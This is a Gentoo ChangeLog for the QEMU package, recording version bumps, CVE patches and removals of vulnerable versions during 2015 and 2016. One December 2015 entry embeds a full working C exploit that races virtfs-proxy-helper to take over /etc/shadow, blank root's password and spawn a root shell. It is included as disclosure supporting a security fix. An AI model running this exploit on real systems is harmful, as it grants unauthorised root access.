# ChangeLog for app-emulation/qemu # Copyright 1999-2016 Gentoo Foundation; Distributed under the GPL v2 # (auto-generated from git log) *qemu-9999 (09 Aug 2015) *qemu-2.3.0-r5 (09 Aug 2015) *qemu-2.3.0-r4 (09 Aug 2015) 09 Aug 2015; Robin H. Johnson +files/65-kvm.rules, +files/bridge.conf, +files/qemu-1.7.0-cflags.patch, +files/qemu-2.2.1-CVE-2015-1779-1.patch, +files/qemu-2.2.1-CVE-2015-1779-2.patch, +files/qemu-2.3.0-CVE-2015-3209.patch, +files/qemu-2.3.0-CVE-2015-3214.patch, +files/qemu-2.3.0-CVE-2015-3456.patch, +files/qemu-2.3.0-CVE-2015-5154-1.patch, +files/qemu-2.3.0-CVE-2015-5154-2.patch, +files/qemu-2.3.0-CVE-2015-5154-3.patch, +files/qemu-2.3.0-CVE-2015-5158.patch, +files/qemu-2.3.0-CVE-2015-5165-1.patch, +files/qemu-2.3.0-CVE-2015-5165-2.patch, +files/qemu-2.3.0-CVE-2015-5165-3.patch, +files/qemu-2.3.0-CVE-2015-5165-4.patch, +files/qemu-2.3.0-CVE-2015-5165-5.patch, +files/qemu-2.3.0-CVE-2015-5165-6.patch, +files/qemu-2.3.0-CVE-2015-5165-7.patch, +files/qemu-2.3.0-CVE-2015-5166.patch, +files/qemu-binfmt.initd-r1, +metadata.xml, +qemu-2.3.0-r4.ebuild, +qemu-2.3.0-r5.ebuild, +qemu-9999.ebuild: proj/gentoo: Initial commit This commit represents a new era for Gentoo: Storing the gentoo-x86 tree in Git, as converted from CVS. This commit is the start of the NEW history. Any historical data is intended to be grafted onto this point. Creation process: 1. Take final CVS checkout snapshot 2. Remove ALL ChangeLog* files 3. Transform all Manifests to thin 4. Remove empty Manifests 5. Convert all stale $Header$/$Id$ CVS keywords to non-expanded Git $Id$ 5.1. Do not touch files with -kb/-ko keyword flags. Signed-off-by: Robin H. Johnson X-Thanks: Alec Warner - did the GSoC 2006 migration tests X-Thanks: Robin H. Johnson - infra guy, herding this project X-Thanks: Nguyen Thai Ngoc Duy - Former Gentoo developer, wrote Git features for the migration X-Thanks: Brian Harring - wrote much python to improve cvs2svn X-Thanks: Rich Freeman - validation scripts X-Thanks: Patrick Lauer - Gentoo dev, running new 2014 work in migration X-Thanks: Michał Górny - scripts, QA, nagging X-Thanks: All of other Gentoo developers - many ideas and lots of paint on the bikeshed *qemu-2.3.0-r6 (10 Aug 2015) 10 Aug 2015; Mike Frysinger +files/qemu-2.3.0-virtio-serial.patch, +qemu-2.3.0-r6.ebuild: qemu: fix from upstream for virtio-serial security issue #557206 10 Aug 2015; Mike Frysinger qemu-2.3.0-r6.ebuild: qemu: do not put directly into stable *qemu-2.3.1 (12 Aug 2015) 12 Aug 2015; Mike Frysinger +qemu-2.3.1.ebuild: qemu: version bump to 2.3.1 *qemu-2.4.0 (12 Aug 2015) 12 Aug 2015; Mike Frysinger +qemu-2.4.0.ebuild: qemu: version bump to 2.4.0 14 Aug 2015; Mike Frysinger qemu-2.4.0.ebuild, qemu-9999.ebuild: depend on libepoxy for USE=opengl #557488 14 Aug 2015; Mike Frysinger qemu-2.4.0.ebuild, qemu-9999.ebuild: move more deps to softmmu-only case These packages are only used when building softmmu binaries, so don't try pulling them in when the user is building tools or user binaries. 14 Aug 2015; Mike Frysinger qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild: switch to virtual/libusb to quiet repoman Now that the virtual requires the latest libusb, we can switch to that rather than depending directly on libusb's version. 16 Aug 2015; Justin Lecher metadata.xml, qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild: Use slot operators for ncurses Package-Manager: portage-2.2.20.1 Signed-off-by: Justin Lecher 24 Aug 2015; Justin Lecher metadata.xml, qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild: Use https by default Convert all URLs for sites supporting encrypted connections from http to https Signed-off-by: Justin Lecher 24 Aug 2015; Mike Gilbert metadata.xml: Revert DOCTYPE SYSTEM https changes in metadata.xml repoman does not yet accept the https version. This partially reverts eaaface92ee81f30a6ac66fe7acbcc42c00dc450. Bug: https://bugs.gentoo.org/552720 26 Aug 2015; Mike Frysinger qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild: sys-libs/ncurses: move to SLOT=0 #557472 Use SLOT=0 for installing of main development files like other packages so we can use other SLOTs for installing SONAME libs for binary packages. 28 Aug 2015; Manuel Rüger -qemu-2.3.0-r4.ebuild: Remove vulnerable Package-Manager: portage-2.2.20.1 07 Sep 2015; Mike Frysinger qemu-9999.ebuild: add new targets 07 Sep 2015; Mike Frysinger qemu-9999.ebuild: update seabios pin to version 1.8.2 07 Sep 2015; Mike Frysinger qemu-9999.ebuild: add target sanity checks This way we know up front when a new target appears rather than when someone happens to check & notice. *qemu-2.4.0-r1 (07 Sep 2015) 07 Sep 2015; Mike Frysinger +files/qemu-2.4.0-CVE-2015-5225.patch, +files/qemu-2.4.0-block-mirror-crash.patch, +files/qemu-2.4.0-e1000-loop.patch, -qemu-2.4.0.ebuild, +qemu-2.4.0-r1.ebuild: various fixes/updates Sync in the updates from the 9999 ebuild: - updated seabios pin - add new targets - add sanity checks for targets Add fix from upstream for blockcommit crashes #558396. Add fix from upstream for CVE-2015-5225 #558416. Add fix posted upstream (but not yet merged) for e1000 infinite loop #559656. 08 Sep 2015; Agostino Sarubbo qemu-2.4.0-r1.ebuild: amd64 stable wrt bug #558416 Package-Manager: portage-2.2.20.1 RepoMan-Options: --include-arches="amd64" 08 Sep 2015; Agostino Sarubbo qemu-2.4.0-r1.ebuild: x86 stable wrt bug #558416 Package-Manager: portage-2.2.20.1 RepoMan-Options: --include-arches="x86" 11 Sep 2015; Mike Frysinger qemu-2.4.0-r1.ebuild, qemu-9999.ebuild: require mesa[egl] too Upstream commit 7ced9e9f6da2257224591b91727cfeee4f3977fb made the egl layer of mesa a requirement. 16 Sep 2015; Mike Frysinger qemu-9999.ebuild: switch USE=tls to USE=gnutls #560574 Upstream no longer has dedicated configuration options for tls settings. Instead, it's all run through the gnutls feature test. We require newer versions of gnutls because supporting older ones gets a bit messy -- qemu might leverage libgcrypt or nettle depending on how the gnutls package was built. By forcing the latest version, we can simplify and only require nettle. This isn't a big deal as it's already stable. 26 Sep 2015; Mike Frysinger qemu-9999.ebuild: add tilegx linux-user target #561322 29 Sep 2015; Mike Frysinger qemu-9999.ebuild: update smartcard configure flag #561670 *qemu-2.4.0.1 (10 Oct 2015) 10 Oct 2015; Mike Frysinger +files/qemu-2.4.0-CVE-2015-6855.patch, +files/qemu-2.4.0-CVE-2015-7295-1.patch, +files/qemu-2.4.0-CVE-2015-7295-2.patch, +files/qemu-2.4.0-CVE-2015-7295-3.patch, +qemu-2.4.0.1.ebuild: version bump to 2.4.0.1 #562594 This also includes security fixes for #560760 #560550 #560422. *qemu-2.4.0.1-r1 (15 Oct 2015) 15 Oct 2015; Markos Chandras +files/qemu-2.4-mips-fix-mtc0.patch, +files/qemu-2.4-mips-fix-rdhwr.patch, +files/qemu-2.4-mips-move-interrupts-new-func.patch, +files/qemu-2.4-mips-wake-up-on-irq.patch, +qemu-2.4.0.1-r1.ebuild: Backport a few MIPS patches. Bug #563162 Package-Manager: portage-2.2.23 26 Oct 2015; Mike Frysinger qemu-9999.ebuild: update qmp doc paths #564186 *qemu-2.4.1 (06 Nov 2015) 06 Nov 2015; Mike Frysinger +qemu-2.4.1.ebuild: version bump to 2.4.1 #564990 07 Nov 2015; Mike Frysinger qemu-2.4.0-r1.ebuild, qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild, qemu-9999.ebuild: force C locale for sorting to workaround glibc bug #564936 23 Nov 2015; Mike Frysinger +files/qemu-2.5.0-cflags.patch, qemu-9999.ebuild: update cflags patch #565866 07 Dec 2015; Doug Goldstein qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild, qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild, qemu-9999.ebuild: utilize xen-tools sub-slot app-emulation/xen-tools now exposes a sub-slot to help dependencies rebuild when necessary. Signed-off-by: Doug Goldstein *qemu-2.4.1-r1 (08 Dec 2015) 08 Dec 2015; Mike Frysinger +files/qemu-2.4.1-CVE-2015-7504.patch, +files/qemu-2.4.1-CVE-2015-7512.patch, +files/qemu-2.4.1-CVE-2015-8345.patch, +qemu-2.4.1-r1.ebuild: add upstream security fixes #566792 #567144 08 Dec 2015; Mike Frysinger metadata.xml, qemu-9999.ebuild: add USE=virgl for Virgil 3d GPU #566994 08 Dec 2015; Mike Frysinger qemu-9999.ebuild: switch to new libcacard release #561814 *qemu-2.4.0.1-r2 (14 Dec 2015) *qemu-2.4.0-r2 (14 Dec 2015) *qemu-2.3.1-r1 (14 Dec 2015) *qemu-2.3.0-r7 (14 Dec 2015) 14 Dec 2015; Jason A. Donenfeld +qemu-2.3.0-r7.ebuild, +qemu-2.3.1-r1.ebuild, +qemu-2.4.0-r2.ebuild, +qemu-2.4.0.1-r2.ebuild: critical security fix The virtfs-proxy-helper program is not a safe binary to give caps. The following exploit code demonstrates the vulnerability: ~=~=~=~= snip ~=~=~=~= /* == virtfshell == * * Some distributions make virtfs-proxy-helper from QEMU either SUID or * give it CAP_CHOWN fs capabilities. This is a terrible idea. While * virtfs-proxy-helper makes some sort of flimsy check to make sure * its socket path doesn't already exist, it is vulnerable to TOCTOU. * * This should spawn a root shell eventually on vulnerable systems. * * - zx2c4 * 2015-12-12 * * * zx2c4@thinkpad ~ $ lsb_release -i * Distributor ID: Gentoo * zx2c4@thinkpad ~ $ ./virtfshell * == Virtfshell - by zx2c4 == * [+] Beginning race loop * [+] Chown'd /etc/shadow, elevating to root * [+] Cleaning up * [+] Spawning root shell * thinkpad zx2c4 # whoami * root * */ #include #include #include #include #include #include #include #include static int it_worked(void) { struct stat sbuf = { 0 }; stat("/etc/shadow", &sbuf); return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); } int main(int argc, char **argv) { int fd; pid_t pid; char uid[12], gid[12]; sprintf(uid, "%d", getuid()); sprintf(gid, "%d", getgid()); printf("== Virtfshell - by zx2c4 ==\n"); printf("[+] Beginning race loop\n"); while (!it_worked()) { fd = inotify_init(); unlink("/tmp/virtfshell/sock"); mkdir("/tmp/virtfshell", 0777); inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE); pid = fork(); if (!pid) { close(0); close(1); close(2); execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL); _exit(1); } read(fd, 0, 0); unlink("/tmp/virtfshell/sock"); symlink("/etc/shadow", "/tmp/virtfshell/sock"); close(fd); kill(pid, SIGKILL); wait(NULL); } printf("[+] Chown'd /etc/shadow, elevating to root\n"); system( "cp /etc/shadow /tmp/original_shadow;" "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;" "cat /tmp/modified_shadow > /etc/shadow;" "su -c '" " echo [+] Cleaning up;" " cat /tmp/original_shadow > /etc/shadow;" " chown root:root /etc/shadow;" " rm /tmp/modified_shadow /tmp/original_shadow;" " echo [+] Spawning root shell;" " exec /bin/bash -i" "'"); return 0; } 15 Dec 2015; Mike Frysinger qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild, qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild, qemu-2.4.1-r1.ebuild, qemu-9999.ebuild: drop virtfs-proxy-helper fcaps from all versions #568226 *qemu-2.4.1-r2 (15 Dec 2015) 15 Dec 2015; Mike Frysinger +files/qemu-2.4.1-CVE-2015-7549.patch, +files/qemu-2.4.1-CVE-2015-8504.patch, +qemu-2.4.1-r2.ebuild: add upstream fixes for #567828 #568214 16 Dec 2015; Agostino Sarubbo qemu-2.4.1-r2.ebuild: amd64 stable wrt bug #567828 Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 16 Dec 2015; Agostino Sarubbo qemu-2.4.1-r2.ebuild: x86 stable wrt bug #567828 Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo *qemu-2.5.0 (17 Dec 2015) 17 Dec 2015; Mike Frysinger +qemu-2.5.0.ebuild: version bump to 2.5.0 17 Dec 2015; Mike Frysinger -files/qemu-2.2.1-CVE-2015-1779-1.patch, -files/qemu-2.2.1-CVE-2015-1779-2.patch, -files/qemu-2.3.0-CVE-2015-3209.patch, -files/qemu-2.3.0-CVE-2015-3214.patch, -files/qemu-2.3.0-CVE-2015-3456.patch, -files/qemu-2.3.0-CVE-2015-5154-1.patch, -files/qemu-2.3.0-CVE-2015-5154-2.patch, -files/qemu-2.3.0-CVE-2015-5154-3.patch, -files/qemu-2.3.0-CVE-2015-5158.patch, -files/qemu-2.3.0-CVE-2015-5165-1.patch, -files/qemu-2.3.0-CVE-2015-5165-2.patch, -files/qemu-2.3.0-CVE-2015-5165-3.patch, -files/qemu-2.3.0-CVE-2015-5165-4.patch, -files/qemu-2.3.0-CVE-2015-5165-5.patch, -files/qemu-2.3.0-CVE-2015-5165-6.patch, -files/qemu-2.3.0-CVE-2015-5165-7.patch, -files/qemu-2.3.0-CVE-2015-5166.patch, -files/qemu-2.3.0-virtio-serial.patch, -files/qemu-2.4.0-CVE-2015-5225.patch, -files/qemu-2.4.0-CVE-2015-6855.patch, -files/qemu-2.4.0-CVE-2015-7295-1.patch, -files/qemu-2.4.0-CVE-2015-7295-2.patch, -files/qemu-2.4.0-CVE-2015-7295-3.patch, -files/qemu-2.4.0-block-mirror-crash.patch, -files/qemu-2.4.0-e1000-loop.patch, -qemu-2.3.0-r5.ebuild, -qemu-2.3.0-r6.ebuild, -qemu-2.3.0-r7.ebuild, -qemu-2.3.1.ebuild, -qemu-2.3.1-r1.ebuild, -qemu-2.4.0-r1.ebuild, -qemu-2.4.0-r2.ebuild, -qemu-2.4.0.1.ebuild, -qemu-2.4.0.1-r1.ebuild, -qemu-2.4.0.1-r2.ebuild, -qemu-2.4.1.ebuild, -qemu-2.4.1-r1.ebuild: drop versions <2.4.1-r2 20 Dec 2015; Mike Frysinger qemu-2.5.0.ebuild, qemu-9999.ebuild: disable libgcrypt usage #568856 *qemu-2.5.0-r1 (18 Jan 2016) 18 Jan 2016; Mike Frysinger +files/qemu-2.5.0-CVE-2015-8558.patch, +files/qemu-2.5.0-CVE-2015-8567.patch, +files/qemu-2.5.0-CVE-2015-8701.patch, +files/qemu-2.5.0-CVE-2015-8743.patch, +files/qemu-2.5.0-CVE-2016-1568.patch, +qemu-2.5.0-r1.ebuild: add upstream fixes for #567868 #568246 #570110 #570988 #571566 24 Jan 2016; Michał Górny metadata.xml: Replace all herds with appropriate projects (GLEP 67) Replace all uses of herd with appropriate project maintainers, or no maintainers in case of herds requested to be disbanded. 24 Jan 2016; Michał Górny metadata.xml: Set appropriate maintainer types in metadata.xml (GLEP 67) 26 Jan 2016; Agostino Sarubbo qemu-2.5.0-r1.ebuild: amd64 stable wrt bug #571566 Package-Manager: portage-2.2.26 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 26 Jan 2016; Agostino Sarubbo qemu-2.5.0-r1.ebuild: x86 stable wrt bug #571566 Package-Manager: portage-2.2.26 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 15 Feb 2016; Doug Goldstein -files/qemu-1.7.0-cflags.patch, -files/qemu-2.4-mips-fix-mtc0.patch, -files/qemu-2.4-mips-fix-rdhwr.patch, -files/qemu-2.4-mips-move-interrupts-new-func.patch, -files/qemu-2.4-mips-wake-up-on-irq.patch, -files/qemu-2.4.1-CVE-2015-7504.patch, -files/qemu-2.4.1-CVE-2015-7512.patch, -files/qemu-2.4.1-CVE-2015-7549.patch, -files/qemu-2.4.1-CVE-2015-8345.patch, -files/qemu-2.4.1-CVE-2015-8504.patch, -qemu-2.4.1-r2.ebuild, -qemu-2.5.0.ebuild: remove vulnerable versions Package-Manager: portage-2.2.26 Signed-off-by: Doug Goldstein 15 Feb 2016; Patrick Lauer metadata.xml: Remove unneeded useflag description from metadata.xml Package-Manager: portage-2.2.27 19 Feb 2016; Robin H. Johnson metadata.xml: restore USE=gnutls use desc for side-effects commit ea4d1e1fcc just removed the USE=tls, rather than updating it for USE=gnutls. Per the description, it has side-effects of enabling enabling WebSocket & disk quorum features. Package-Manager: portage-2.2.27 28 Feb 2016; Doug Goldstein qemu-2.5.0-r1.ebuild: fix arm64 dependencies arm/arm64 have some dependencies which are higher than other platforms. Unfortunately the dependencies are not stable on arm but this package is so arm updates will come later. Package-Manager: portage-2.2.26 Signed-off-by: Doug Goldstein 28 Feb 2016; Matthew Thode qemu-2.5.0-r1.ebuild: keywording arm64 merged on X-C1 Package-Manager: portage-2.2.26 15 Mar 2016; Doug Goldstein qemu-2.5.0-r1.ebuild: fix arm depends for libseccomp arm needs libseccomp 2.2.3 or newer for QEMU to be able to utilize it. Package-Manager: portage-2.2.26 Signed-off-by: Doug Goldstein *qemu-2.5.0-r2 (23 Mar 2016) 23 Mar 2016; Mike Frysinger +files/qemu-2.5.0-CVE-2015-8613.patch, +files/qemu-2.5.0-CVE-2015-8619.patch, +files/qemu-2.5.0-CVE-2016-1714.patch, +files/qemu-2.5.0-CVE-2016-1922.patch, +files/qemu-2.5.0-CVE-2016-1981.patch, +files/qemu-2.5.0-CVE-2016-2197.patch, +files/qemu-2.5.0-CVE-2016-2198.patch, +files/qemu-2.5.0-CVE-2016-2392.patch, +files/qemu-2.5.0-rng-stack-corrupt-0.patch, +files/qemu-2.5.0-rng-stack-corrupt-1.patch, +files/qemu-2.5.0-rng-stack-corrupt-2.patch, +files/qemu-2.5.0-rng-stack-corrupt-3.patch, +files/qemu-2.5.0-sysmacros.patch, +files/qemu-2.5.0-usb-ehci-oob.patch, +files/qemu-2.5.0-usb-ndis-int-overflow.patch, +qemu-2.5.0-r2.ebuild: backport various upstream fixes 24 Mar 2016; Agostino Sarubbo qemu-2.5.0-r2.ebuild: amd64 stable wrt bug #578044 Package-Manager: portage-2.2.26 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 24 Mar 2016; Agostino Sarubbo qemu-2.5.0-r2.ebuild: x86 stable wrt bug #578044 Package-Manager: portage-2.2.26 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 25 Mar 2016; Sergey Popov -qemu-2.5.0-r1.ebuild: security cleanup Gentoo-Bug: 576420 Package-Manager: portage-2.2.28 28 Mar 2016; Mike Frysinger qemu-2.5.0-r2.ebuild, qemu-9999.ebuild: use l10n.eclass to respect LINGUAS #577814 *qemu-2.5.0-r3 (28 Mar 2016) 28 Mar 2016; Mike Frysinger +files/qemu-2.5.0-9pfs-segfault.patch, +files/qemu-2.5.0-ne2000-reg-check.patch, +qemu-2.5.0-r3.ebuild: add few more upstream fixes #573816 #578142 29 Mar 2016; Agostino Sarubbo qemu-2.5.0-r3.ebuild: amd64 stable wrt bug #573816 Package-Manager: portage-2.2.26 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 29 Mar 2016; Agostino Sarubbo qemu-2.5.0-r3.ebuild: x86 stable wrt bug #573816 Package-Manager: portage-2.2.26 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 20 Apr 2016; Mike Frysinger qemu-2.5.0-r3.ebuild, qemu-9999.ebuild: mention /dev/kvm perm updates in the readme/elog #580436 *qemu-2.5.1 (23 Apr 2016) 23 Apr 2016; Mike Frysinger +files/qemu-2.5.1-CVE-2015-8558.patch, +files/qemu-2.5.1-CVE-2016-4020.patch, +files/qemu-2.5.1-stellaris_enet-overflow.patch, +qemu-2.5.1.ebuild: app-misc/qemu: version bump & bug fixes #579614 #580040 #580426 12 May 2016; Mike Frysinger qemu-2.5.1.ebuild, qemu-9999.ebuild: use subslots w/nettle & gnutls #582836 *qemu-2.6.0 (17 May 2016) 17 May 2016; Mike Frysinger +qemu-2.6.0.ebuild, qemu-9999.ebuild: version bump to 2.6.0 #583212 17 May 2016; Mike Frysinger +files/qemu-2.5.1-xfs-linux-headers.patch, qemu-2.5.1.ebuild: workaround breakage in xfs/linux headers #577810 Add upstream patch to workaround some combinations of xfsprogs & linux headers so we don't have to worry about stable breakage anymore. This fix is already in upstream & unstable versions. 18 May 2016; Austin English files/qemu-binfmt.initd-r1: use #!/sbin/openrc-run instead of #!/sbin/runscript 06 Jun 2016; Mike Frysinger qemu-2.5.0-r2.ebuild, qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild, qemu-9999.ebuild: depend on jpeg SLOT=0 for building 07 Jun 2016; Mike Frysinger +files/qemu-2.6.0-crypto-static.patch, qemu-2.6.0.ebuild, qemu-9999.ebuild: fix static linking errors w/curl[ssl,curl_ssl_openssl] 21 Jun 2016; Mike Frysinger qemu-9999.ebuild: drop kvm_stat to match upstream #586158 29 Jun 2016; Alexey Shvetsov qemu-2.5.0-r2.ebuild, qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild, qemu-9999.ebuild: adapt sys-infiniband to sys-fabric rename Package-Manager: portage-2.3.0_rc1 01 Aug 2016; Mike Frysinger qemu-2.5.1.ebuild, qemu-2.6.0.ebuild, qemu-9999.ebuild: handle bzip2 dep #589968 The block layer uses it to support bzip2 compression in dmg images. That code makes it into softmmu binaries and userland utils. 07 Aug 2016; Luca Barbato +files/qemu-2.6.0-glib-size_t.patch, qemu-2.6.0.ebuild: Drop a -Werror when it could cause a false positive The check code could trigger recent compiler warnings. Package-Manager: portage-2.2.26 15 Aug 2016; Luca Barbato files/qemu-binfmt.initd-r1: Update ppc magic mask Unbreak using qemu-user with current stage3. Package-Manager: portage-2.3.0 21 Aug 2016; Luca Barbato qemu-9999.ebuild: Update the languages list Package-Manager: portage-2.3.0 21 Aug 2016; Luca Barbato qemu-9999.ebuild: Drop a patch It is already upstreamed. Package-Manager: portage-2.3.0 05 Sep 2016; Matthias Maier -qemu-2.5.0-r2.ebuild, -qemu-2.5.0-r3.ebuild: remove vulnerable 2.5.0 Package-Manager: portage-2.2.28 *qemu-2.7.0 (05 Sep 2016) 05 Sep 2016; Matthias Maier +qemu-2.7.0.ebuild: version bump to 2.7.0, various security fixes 3af9187fc6caaf415ab9c0c6d92c9678f65cb17f -> CVE-2016-4001, bug #579734 3a15cc0e1ee7168db0782133d2607a6bfa422d66 -> CVE-2016-4002, bug #579734 c98c6c105f66f05aa0b7c1d2a4a3f716450907ef -> CVE-2016-4439, bug #583496 6c1fef6b59563cc415f21e03f81539ed4b33ad90 -> CVE-2016-4441, bug #583496 06630554ccbdd25780aa03c3548aaff1eb56dffd -> , bug #583952 844864fbae66935951529408831c2f22367a57b6 -> CVE-2016-5337, bug #584094 b60bdd1f1ee1616b7a9aeeffb4088e1ce2710fb2 -> , bug #584102 1b85898025c4cd95dce673d15e67e60e98e91731 -> , bug #584146 521360267876d3b6518b328051a2e56bca55bef8 -> CVE-2016-4453, bug #584514 4e68a0ee17dad7b8d870df0081d4ab2e079016c2 -> CVE-2016-4454, bug #584514 a6b3167fa0e825aebb5a7cd8b437b6d41584a196 -> CVE-2016-5126, bug #584630 ff589551c8e8e9e95e211b9d8daafb4ed39f1aec -> CVE-2016-5338, bug #584918 d3cdc49138c30be1d3c2f83d18f85d9fdee95f1a -> CVE-2016-5238, bug #584918 1e7aed70144b4673fc26e73062064b6724795e5f -> , bug #589924 afd9096eb1882f23929f5b5c177898ed231bac66 -> CVE-2016-5403, bug #589928 eb700029c7836798046191d62d595363d92c84d4 -> CVE-2016-6835, bug #591244 ead315e43ea0c2ca3491209c6c8db8ce3f2bbe05 -> CVE-2016-6834, bug #591374 6c352ca9b4ee3e1e286ea9e8434bd8e69ac7d0d8 -> CVE-2016-6833, bug #591380 47882fa4975bf0b58dd74474329fdd7154e8f04c -> CVE-2016-6888, bug #591678 805b5d98c649d26fc44d2d7755a97f18e62b438a 56f101ecce0eafd09e2daf1c4eeb1377d6959261 fff39a7ad09da07ef490de05c92c91f22f8002f2 -> , bug #592430 Package-Manager: portage-2.2.28 05 Sep 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-6836.patch, qemu-2.7.0.ebuild: apply patch for CVE-2016-6836, bug #591242 Package-Manager: portage-2.2.28 05 Sep 2016; Matthias Maier -qemu-2.6.0.ebuild, qemu-2.7.0.ebuild: drop vulnerable 2.6.0 Package-Manager: portage-2.2.28 05 Sep 2016; Matthias Maier -files/qemu-2.5.0-9pfs-segfault.patch, -files/qemu-2.5.0-CVE-2015-8567.patch, -files/qemu-2.5.0-CVE-2015-8613.patch, -files/qemu-2.5.0-CVE-2015-8619.patch, -files/qemu-2.5.0-CVE-2015-8701.patch, -files/qemu-2.5.0-CVE-2015-8743.patch, -files/qemu-2.5.0-CVE-2016-1568.patch, -files/qemu-2.5.0-CVE-2016-1714.patch, -files/qemu-2.5.0-CVE-2016-1922.patch, -files/qemu-2.5.0-CVE-2016-1981.patch, -files/qemu-2.5.0-CVE-2016-2197.patch, -files/qemu-2.5.0-CVE-2016-2392.patch, -files/qemu-2.5.0-ne2000-reg-check.patch, -files/qemu-2.5.0-usb-ehci-oob.patch, -files/qemu-2.5.0-usb-ndis-int-overflow.patch, -files/qemu-2.6.0-crypto-static.patch, -files/qemu-2.6.0-glib-size_t.patch: drop obsolete patches Package-Manager: portage-2.2.28 05 Sep 2016; Matthias Maier qemu-2.7.0.ebuild: fix installation with USE=python, bug #592908 Package-Manager: portage-2.2.28 05 Sep 2016; Agostino Sarubbo qemu-2.7.0.ebuild: amd64 stable wrt bug #592430 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 05 Sep 2016; Agostino Sarubbo qemu-2.7.0.ebuild: x86 stable wrt bug #592430 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 05 Sep 2016; Matthias Maier -files/qemu-2.5.0-CVE-2015-8558.patch, -files/qemu-2.5.0-CVE-2016-2198.patch, -files/qemu-2.5.0-rng-stack-corrupt-0.patch, -files/qemu-2.5.0-rng-stack-corrupt-1.patch, -files/qemu-2.5.0-rng-stack-corrupt-2.patch, -files/qemu-2.5.0-rng-stack-corrupt-3.patch, -files/qemu-2.5.1-CVE-2015-8558.patch, -files/qemu-2.5.1-CVE-2016-4020.patch, -files/qemu-2.5.1-stellaris_enet-overflow.patch, -files/qemu-2.5.1-xfs-linux-headers.patch, -qemu-2.5.1.ebuild: drop vulnerable 2.5.1, bug #592430, and 19 others Package-Manager: portage-2.2.28 *qemu-2.7.0-r1 (09 Sep 2016) 09 Sep 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-7155.patch, +files/qemu-2.7.0-CVE-2016-7156.patch, +files/qemu-2.7.0-CVE-2016-7157-1.patch, +files/qemu-2.7.0-CVE-2016-7157-2.patch, +qemu-2.7.0-r1.ebuild: fix static-user dep, security patches, bug #593038 This commit resolves bug #591202 bug #593024 bug #593034 CVE-2016-7155 bug #593036 CVE-2016-7156 bug #593038 CVE-2016-7157 Package-Manager: portage-2.2.28 *qemu-2.7.0-r2 (10 Sep 2016) 10 Sep 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-7170.patch, -qemu-2.7.0-r1.ebuild, +qemu-2.7.0-r2.ebuild: apply fix for CVE-2016-7170, bug #593284 Package-Manager: portage-2.2.28 10 Sep 2016; Agostino Sarubbo qemu-2.7.0-r2.ebuild: amd64 stable wrt bug #593038 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo *qemu-2.7.0-r3 (18 Sep 2016) 18 Sep 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-7421.patch, +files/qemu-2.7.0-CVE-2016-7422.patch, +qemu-2.7.0-r3.ebuild: security fixes, ebuild maintenance bug 593956: CVE-2016-7422 bug 593950: CVE-2016-7421 bug 590230: missing use depend opengl? ( media-libs/mesa[...,gbm] ) bug 575326: update to readme.gentoo-r1 eclass Package-Manager: portage-2.2.28 18 Sep 2016; Agostino Sarubbo qemu-2.7.0-r3.ebuild: amd64 stable wrt bug #593038 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo 18 Sep 2016; Agostino Sarubbo qemu-2.7.0-r3.ebuild: x86 stable wrt bug #593038 Package-Manager: portage-2.2.28 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo 26 Sep 2016; Matthias Maier -qemu-2.7.0.ebuild, -qemu-2.7.0-r2.ebuild: drop vulnerable versions 2.7.0, 2.7.0-r2 Package-Manager: portage-2.2.28 *qemu-2.7.0-r4 (27 Sep 2016) 27 Sep 2016; Matthias Maier +files/qemu-2.7.0-CVE-2016-7423.patch, +files/qemu-2.7.0-CVE-2016-7466.patch, +qemu-2.7.0-r4.ebuild: security fixes, bug #594520, bug #594368 CVE-2016-7466.patch # 